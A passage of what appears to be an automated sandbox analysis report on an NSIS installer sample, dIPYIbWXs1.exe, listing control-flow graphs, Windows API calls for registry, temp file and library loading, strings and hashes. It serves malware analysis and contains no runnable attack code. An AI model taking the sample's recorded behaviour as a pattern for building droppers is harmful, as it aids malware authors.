                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%s.dll$UXTHEME$\
                                                        • API String ID: 2200240437-4240819195
                                                        • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                        • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                        • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                        • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 558 405cbf-405cc9 559 405cca-405cf5 GetTickCount GetTempFileNameA 558->559 560 405d04-405d06 559->560 561 405cf7-405cf9 559->561 563 405cfe-405d01 560->563 561->559 562 405cfb 561->562 562->563
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405CD3
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                        Strings
                                                        • nsa, xrefs: 00405CCA
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                        • "C:\Users\user\Desktop\dIPYIbWXs1.exe", xrefs: 00405CBF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\dIPYIbWXs1.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-1753224044
                                                        • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                        • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                        • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                        • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 564 402cd0-402cf9 call 405f7d 566 402cfe-402d02 564->566 567 402db3-402db7 566->567 568 402d08-402d0c 566->568 569 402d31-402d44 568->569 570 402d0e-402d2f RegEnumValueA 568->570 572 402d6d-402d74 RegEnumKeyA 569->572 570->569 571 402d98-402da6 RegCloseKey 570->571 571->567 573 402d46-402d48 572->573 574 402d76-402d88 RegCloseKey call 406500 572->574 573->571 575 402d4a-402d5e call 402cd0 573->575 580 402da8-402dae 574->580 581 402d8a-402d96 RegDeleteKeyA 574->581 575->574 582 402d60-402d6c 575->582 580->567 581->567 582->572
                                                        APIs
                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        • API String ID: 1354259210-0
                                                        • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                        • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                        • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                        • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 583 6e4b16db-6e4b1717 call 6e4b1a98 587 6e4b171d-6e4b1721 583->587 588 6e4b1834-6e4b1836 583->588 589 6e4b172a-6e4b1737 call 6e4b22f1 587->589 590 6e4b1723-6e4b1729 call 6e4b22af 587->590 595 6e4b1739-6e4b173e 589->595 596 6e4b1767-6e4b176e 589->596 590->589 599 6e4b1759-6e4b175c 595->599 600 6e4b1740-6e4b1741 595->600 597 6e4b178e-6e4b1792 596->597 598 6e4b1770-6e4b178c call 6e4b24d8 call 6e4b1559 call 6e4b1266 GlobalFree 596->598 601 6e4b17dc-6e4b17e2 call 6e4b24d8 597->601 602 6e4b1794-6e4b17da call 6e4b156b call 6e4b24d8 597->602 623 6e4b17e3-6e4b17e7 598->623 599->596 603 6e4b175e-6e4b175f call 6e4b2cc3 599->603 605 6e4b1749-6e4b174a call 6e4b2a38 600->605 606 6e4b1743-6e4b1744 600->606 601->623 602->623 617 6e4b1764 603->617 614 6e4b174f 605->614 612 6e4b1751-6e4b1757 call 6e4b26b2 606->612 613 6e4b1746-6e4b1747 606->613 622 6e4b1766 612->622 613->596 613->605 614->617 617->622 622->596 627 6e4b17e9-6e4b17f7 call 6e4b249e 623->627 628 6e4b1824-6e4b182b 623->628 633 6e4b17f9-6e4b17fc 627->633 634 6e4b180f-6e4b1816 627->634 628->588 630 6e4b182d-6e4b182e GlobalFree 628->630 630->588 633->634 635 6e4b17fe-6e4b1806 633->635 634->628 636 6e4b1818-6e4b1823 call 6e4b14e2 634->636 635->634 637 6e4b1808-6e4b1809 FreeLibrary 635->637 636->628 637->634
                                                        APIs
                                                          • Part of subcall function 6E4B1A98: GlobalFree.KERNEL32(?), ref: 6E4B1D09
                                                          • Part of subcall function 6E4B1A98: GlobalFree.KERNEL32(?), ref: 6E4B1D0E
                                                          • Part of subcall function 6E4B1A98: GlobalFree.KERNEL32(?), ref: 6E4B1D13
                                                        • GlobalFree.KERNEL32(00000000), ref: 6E4B1786
                                                        • FreeLibrary.KERNEL32(?), ref: 6E4B1809
                                                        • GlobalFree.KERNEL32(00000000), ref: 6E4B182E
                                                          • Part of subcall function 6E4B22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6E4B22E0
                                                          • Part of subcall function 6E4B26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E4B1757,00000000), ref: 6E4B2782
                                                          • Part of subcall function 6E4B156B: wsprintfA.USER32 ref: 6E4B1599
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3953123008.000000006E4B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E4B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3953105444.000000006E4B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953136467.000000006E4B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953149275.000000006E4B5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6e4b0000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                        • String ID:
                                                        • API String ID: 3962662361-3916222277
                                                        • Opcode ID: 23ae0045b60132db525b6d6100db78876409e7f1911cb9f5666ae9d4372fcfff
                                                        • Instruction ID: 1c21c7a31614bb1b5f5188b3a2646654bf9b89deab3fcb2c4054f628f51e8b48
                                                        • Opcode Fuzzy Hash: 23ae0045b60132db525b6d6100db78876409e7f1911cb9f5666ae9d4372fcfff
                                                        • Instruction Fuzzy Hash: 38417E714002059BCB40AFF599D4FD637ACBF06318F04886BE9159B786DF74844AC7B0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 640 401c2e-401c4e call 402bac * 2 645 401c50-401c57 call 402bce 640->645 646 401c5a-401c5e 640->646 645->646 647 401c60-401c67 call 402bce 646->647 648 401c6a-401c70 646->648 647->648 652 401c72-401c8e call 402bac * 2 648->652 653 401cbe-401ce4 call 402bce * 2 FindWindowExA 648->653 664 401c90-401cac SendMessageTimeoutA 652->664 665 401cae-401cbc SendMessageA 652->665 663 401cea 653->663 666 401ced-401cf0 663->666 664->666 665->663 667 401cf6 666->667 668 402a5a-402a69 666->668 667->668
                                                        APIs
                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                        • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                        • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                        • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 671 402476-4024a7 call 402bce * 2 call 402c5e 678 402a5a-402a69 671->678 679 4024ad-4024b7 671->679 681 4024c7-4024ca 679->681 682 4024b9-4024c6 call 402bce lstrlenA 679->682 683 4024e1-4024e4 681->683 684 4024cc-4024e0 call 402bac 681->684 682->681 688 4024f5-402509 RegSetValueExA 683->688 689 4024e6-4024f0 call 4030d8 683->689 684->683 693 40250b 688->693 694 40250e-4025eb RegCloseKey 688->694 689->688 693->694 694->678
                                                        APIs
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscD2B5.tmp,00000023,00000011,00000002), ref: 004024C1
                                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscD2B5.tmp,00000000,00000011,00000002), ref: 00402501
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscD2B5.tmp,00000000,00000011,00000002), ref: 004025E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CloseValuelstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nscD2B5.tmp
                                                        • API String ID: 2655323295-2227367522
                                                        • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                        • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                        • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                        • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                        APIs
                                                        • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 004020C8
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,74DF23A0), ref: 0040527A
                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 004020D8
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402152
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2987980305-0
                                                        • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                        • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                        • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                        • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                        APIs
                                                          • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                          • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                        Strings
                                                        • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\tranchet\Trykmaalere
                                                        • API String ID: 1892508949-1398828102
                                                        • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                        • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                        • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                        • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                        APIs
                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                        • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: Call
                                                        • API String ID: 3356406503-1824292864
                                                        • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                        • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                        • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                        • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                        • CloseHandle.KERNEL32(?), ref: 004057CC
                                                        Strings
                                                        • Error launching installer, xrefs: 004057A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                        • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                        • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                        • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                        APIs
                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscD2B5.tmp,00000000,00000011,00000002), ref: 004025E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseValue
                                                        • String ID:
                                                        • API String ID: 397863658-0
                                                        • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                        • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                        • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                        • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                        APIs
                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscD2B5.tmp,00000000,00000011,00000002), ref: 004025E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
